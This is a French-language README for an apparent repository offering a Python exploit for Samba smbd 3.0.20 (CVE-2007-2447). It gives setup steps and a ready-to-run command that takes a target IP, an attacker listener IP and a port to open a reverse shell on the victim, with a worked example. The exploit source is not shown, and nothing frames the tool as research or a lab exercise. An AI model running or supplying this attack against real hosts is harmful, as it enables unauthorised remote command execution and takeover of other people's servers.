
Exploit Python pour Samba smbd 3.0.20 (CVE-2007-2447) permettant l'exécution de commandes à distance et un reverse shell via des requêtes SMB forgées.
Ce dépôt contient un exploit pour Samba smbd 3.0.20 (CVE-2007-2447) qui permet l'exécution de commandes à distance via des requêtes SMB manipulées.
Cet exploit nécessite Python 3 et quelques dépendances. Il est recommandé de configurer un environnement virtuel avant d'exécuter l'exploit.
Clonez le dépôt :
git clone https://github.com/your-repo/CVE-2007-2447.git
cd CVE-2007-2447
Créez un environnement virtuel Python :
python3 -m venv smb_env
source smb_env/bin/activate # Linux/macOS
(Les utilisateurs Windows peuvent activer en utilisant : smb_env\Scripts\activate)
Installez les dépendances requises :
pip install -r requirements.txt
Une fois l'environnement virtuel configuré, vous pouvez exécuter l'exploit en utilisant la syntaxe suivante :
python3 CVE-2007-2447.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
python3 CVE-2007-2447.py -t 192.168.1.100 -a 192.168.1.50 -p 4444
-t / --target: Adresse IP de la machine cible (victime).-a / --attacker: Adresse IP de l'écouteur de l'attaquant.-p / --port: Port pour établir la connexion du shell inverse.Une fois que vous avez terminé, désactivez l'environnement virtuel en utilisant :
deactivate